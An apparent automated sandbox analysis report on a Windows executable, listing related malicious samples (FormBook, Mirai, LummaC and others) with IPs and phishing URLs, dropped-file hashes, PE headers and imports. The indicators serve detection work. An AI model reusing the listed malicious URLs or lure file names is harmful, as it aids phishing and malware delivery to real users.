gtml.huksa.huhusddfnsuegcdn.com | Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exe | malicious | FormBook, PureLog Stealer | 194.41.37.250
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 104.21.4.93
CLOUDFLARENETUS | MB267382625AE.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | Quote specification and BOQ.exe | malicious | GuLoader | 188.114.96.3
CLOUDFLARENETUS | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | Delivery_Notification_00000260791.doc.js | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | Delivery_Notification_00000875664.doc.js | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | MyInstaller_PDFGear.exe | malicious | Unknown | 104.26.1.29
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | https://astonishing-maize-sunstone.glitch.me/ | malicious | Unknown | 103.1.185.157
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | http://hrlaw.com.au | malicious | Unknown | 103.16.131.131
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | http://coastiesmag.com.au | malicious | Unknown | 103.4.234.120
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | TRe8oqmYKc.elf | malicious | Mirai | 103.16.161.29
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | cundi.mips.elf | malicious | Mirai | 103.16.161.29
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | cundi.x86.elf | malicious | Mirai | 103.16.161.29
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | cundi.x86_64.elf | malicious | Mirai | 103.16.161.29
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | cundi.arm7.elf | malicious | Mirai | 103.16.161.29
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | cundi.arm.elf | malicious | Mirai | 103.16.161.29
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | http://agrisemm.com | malicious | Unknown | 43.229.61.61
NEXINTO-DE | botnet.spc.elf | malicious | Mirai, Moobot | 194.64.167.187
NEXINTO-DE | meerkat.mips.elf | malicious | Mirai | 194.163.45.5
NEXINTO-DE | meerkat.x86.elf | malicious | Mirai | 194.233.145.180
NEXINTO-DE | tyo.x86.elf | malicious | Mirai, Moobot | 194.233.65.110
NEXINTO-DE | New PO [FK4-7173].pdf.exe | malicious | FormBook | 194.195.220.41
NEXINTO-DE | bin.mips.elf | malicious | Mirai | 212.228.79.8
NEXINTO-DE | arm.elf | malicious | Mirai, Gafgyt | 212.229.190.20
NEXINTO-DE | sh4.elf | malicious | Mirai | 195.179.84.16
NEXINTO-DE | splx86.elf | malicious | Unknown | 194.64.162.15
NEXINTO-DE | nabmips.elf | malicious | Unknown | 212.228.44.65
MULTIBAND-NEWHOPEUS | https://hmjpvx0wn1.gaimensebb.shop/ | malicious | EvilProxy, HTMLPhisher | 209.74.95.101
MULTIBAND-NEWHOPEUS | Order No 24.exe | malicious | FormBook | 209.74.64.58
MULTIBAND-NEWHOPEUS | dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | malicious | FormBook | 209.74.64.187
MULTIBAND-NEWHOPEUS | RFQ.exe | malicious | FormBook | 209.74.64.58
MULTIBAND-NEWHOPEUS | DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe | malicious | FormBook | 209.74.64.59
MULTIBAND-NEWHOPEUS | https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3D | malicious | HTMLPhisher | 209.74.72.93
MULTIBAND-NEWHOPEUS | statement of accounts.exe | malicious | FormBook | 209.74.64.58
MULTIBAND-NEWHOPEUS | rGO880-PDF.exe | malicious | FormBook | 209.74.64.59
MULTIBAND-NEWHOPEUS | RFQ.exe | malicious | FormBook | 209.74.64.58
MULTIBAND-NEWHOPEUS | Selected_Items.vbs | malicious | FormBook | 209.74.64.59
                                                                      No context
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\winrs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1211596417522893
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                      MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                      SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                      SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                      SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\A2028041200SD.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):287744
                                                                      Entropy (8bit):7.994548369199958
                                                                      Encrypted:true
                                                                      SSDEEP:6144:5hxWvSxwYVGnPlNYkHrQLjnJHfg1KtQUJ3+UDR5tcTkXt7rkV9:Dy/Y8PlNYkHrINo1aQUJ3vl5tcgXt7rq
                                                                      MD5:292E198398B4804ED9B1225A460B6E95
                                                                      SHA1:EF119638F6151A1A4B7B0A6DF96817C8CCD2647B
                                                                      SHA-256:068B8518B839676C57BA3CC4D14C41BBA20BED264781472AA4AE7922A0B67957
                                                                      SHA-512:2DA2C70C5FF4060FB4034ADE83F8167F4EC51C24D80CCEF9E42C250BB1F510C5758D51E6C6145252610491933903E0881FF49B75E42BC09A70A3F9E4B8BB43B0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...C152G4QQ8..FT.P5BF05M.4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BK.T9P;].>5.A.b.4~...9Q1k6&V7G#+.V,&Z,F.P".#$Vb"(t}.fb+_Q(f9N8.2G0QQ8B2G].mU%..U*..#U.(.kX%.\.."!./....RR..Y29.",.T9P5BF05..4C~43G.c.eBKFT9P5B.07LC5H25`C0QQ8BKFT9.!BF0%MH43652GpQQ(BKFV9P3BF05MH4E252G0QQ82OFT;P5BF05OHt.25"G0AQ8BKVT9@5BF05MX4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P.6#HAMH4gb12G QQ8.OFT)P5BF05MH4C252G.QQXBKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ8BKFT9P5BF05MH4C252G0QQ
Process:C:\Users\user\Desktop\A2028041200SD.exe
File Type:data
Category:dropped
Size (bytes):287744
Entropy (8bit):7.994548369199958
Encrypted:true
SSDEEP:6144:5hxWvSxwYVGnPlNYkHrQLjnJHfg1KtQUJ3+UDR5tcTkXt7rkV9:Dy/Y8PlNYkHrINo1aQUJ3vl5tcgXt7rq
MD5:292E198398B4804ED9B1225A460B6E95
SHA1:EF119638F6151A1A4B7B0A6DF96817C8CCD2647B
SHA-256:068B8518B839676C57BA3CC4D14C41BBA20BED264781472AA4AE7922A0B67957
SHA-512:2DA2C70C5FF4060FB4034ADE83F8167F4EC51C24D80CCEF9E42C250BB1F510C5758D51E6C6145252610491933903E0881FF49B75E42BC09A70A3F9E4B8BB43B0
Malicious:false
Reputation:low
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.147203930434446
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:A2028041200SD.exe
File size:1'214'464 bytes
MD5:65a28cddb97884a94a7c9faef74300c3
SHA1:8cdb55cfbf3b463246bfea5ef3b8e3de34c64149
SHA256:78ccda9ce77fc7adb68fac21cc8019dbdc10fadd481f28f28e0428eb35828fbf
SHA512:6085a372018483ccdb19b825c1f9bd378d5cfbd0de6312f64bd1746ddd186a392330721d25746cce1ed26ab1c746f50db5fd5b81584644978312936070ecd2b4
SSDEEP:24576:Ttb20pkaCqT5TBWgNQ7aHkf45YUptDT0n5pe86A:QVg5tQ7aHkfdUbW5pf5
TLSH:3F45CF2273DEC365C3B25273BA16B701BE7B782506A5F96B2FD4093DE820161521EB73
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash:aaf3e3e3938382a0
Entrypoint:0x425f74
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:0x673D6E68 [Wed Nov 20 05:06:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:3d95adbf13bbe79dc24dccb401c12091
Instruction (entrypoint preview)
call 00007FD60CE6532Fh
jmp 00007FD60CE58344h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FD60CE584CAh
cmp edi, eax
jc 00007FD60CE5882Eh
bt dword ptr [004C0158h], 01h
jnc 00007FD60CE584C9h
rep movsb
jmp 00007FD60CE587DCh
cmp ecx, 00000080h
jc 00007FD60CE58694h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FD60CE584D0h
bt dword ptr [004BA370h], 01h
jc 00007FD60CE589A0h
bt dword ptr [004C0158h], 00000000h
jnc 00007FD60CE5866Dh
test edi, 00000003h
jne 00007FD60CE5867Eh
test esi, 00000003h
jne 00007FD60CE5865Dh
bt edi, 02h
jnc 00007FD60CE584CFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FD60CE584D3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FD60CE58525h
bt esi, 03h
jnc 00007FD60CE58578h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb7004          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc4000          0x5f6ec       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x124000         0x6c4c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x8d8d0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xb2730          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8d000          0x860         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
.text   0x1000           0x8b54f       0x8b600   f437a6545e938612764dbb0a314376fc  False     0.5699499019058296   data       6.680413749210956  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8d000          0x2cc42       0x2ce00   827ffd24759e8e420890ecf164be989e  False     0.330464397632312    data       5.770192333189168  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xba000          0x9d54        0x6200    e0a519f8e3a35fae0d9c2cfd5a4bacfc  False     0.16402264030612246  data       2.002691099965349  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc4000          0x5f6ec       0x5f800   35355c9f0a2e0e4aba481b68e3d27ca9  False     0.9309171506871727   data       7.901774946740865  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x124000         0xa474        0xa600    0bc98f8631ef0bde830a7f83bb06ff08  False     0.5017884036144579   data       5.245426654116355  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Language  Country        ZLIB Complexity      Type
RT_ICON        0xc45a8   0x128    English   Great Britain  0.7466216216216216   Device independent bitmap graphic, 16 x 32 x 4, image size 192
RT_ICON        0xc46d0   0x128    English   Great Britain  0.3277027027027027   Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors
RT_ICON        0xc47f8   0x128    English   Great Britain  0.3885135135135135   Device independent bitmap graphic, 16 x 32 x 4, image size 192
RT_ICON        0xc4920   0x2e8    English   Great Britain  0.3333333333333333   Device independent bitmap graphic, 32 x 64 x 4, image size 0
RT_ICON        0xc4c08   0x128    English   Great Britain  0.5                  Device independent bitmap graphic, 16 x 32 x 4, image size 0
RT_ICON        0xc4d30   0xea8    English   Great Britain  0.2835820895522388   Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON        0xc5bd8   0x8a8    English   Great Britain  0.37906137184115524  Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON        0xc6480   0x568    English   Great Britain  0.23699421965317918  Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON        0xc69e8   0x25a8   English   Great Britain  0.13858921161825727  Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON        0xc8f90   0x10a8   English   Great Britain  0.25070356472795496  Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON        0xca038   0x468    English   Great Britain  0.3173758865248227   Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_MENU        0xca4a0   0x50     English   Great Britain  0.9                  data
RT_STRING      0xca4f0   0x594    English   Great Britain  0.3333333333333333   data
RT_STRING      0xcaa84   0x68a    English   Great Britain  0.2747909199522103   data
RT_STRING      0xcb110   0x490    English   Great Britain  0.3715753424657534   data
RT_STRING      0xcb5a0   0x5fc    English   Great Britain  0.3087467362924282   data
RT_STRING      0xcbb9c   0x65c    English   Great Britain  0.34336609336609336  data
RT_STRING      0xcc1f8   0x466    English   Great Britain  0.3605683836589698   data
RT_STRING      0xcc660   0x158    English   Great Britain  0.502906976744186    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0
RT_RCDATA      0xcc7b8   0x569f1                           1.0003269438361222   data
RT_GROUP_ICON  0x1231ac  0x76     English   Great Britain  0.6610169491525424   data
RT_GROUP_ICON  0x123224  0x14     English   Great Britain  1.25                 data
RT_GROUP_ICON  0x123238  0x14     English   Great Britain  1.15                 data
RT_GROUP_ICON  0x12324c  0x14     English   Great Britain  1.25                 data
RT_VERSION     0x123260  0xdc     English   Great Britain  0.6181818181818182   data
RT_MANIFEST    0x12333c  0x3b0    English   Great Britain  0.5116525423728814   ASCII text, with CRLF line terminators
DLL: Import
WSOCK32.dll: __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll: GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll: timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll: ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll: WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll: InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL: GetProcessMemoryInfo
IPHLPAPI.DLL: IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll: UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll: IsThemeActive
KERNEL32.dll: HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
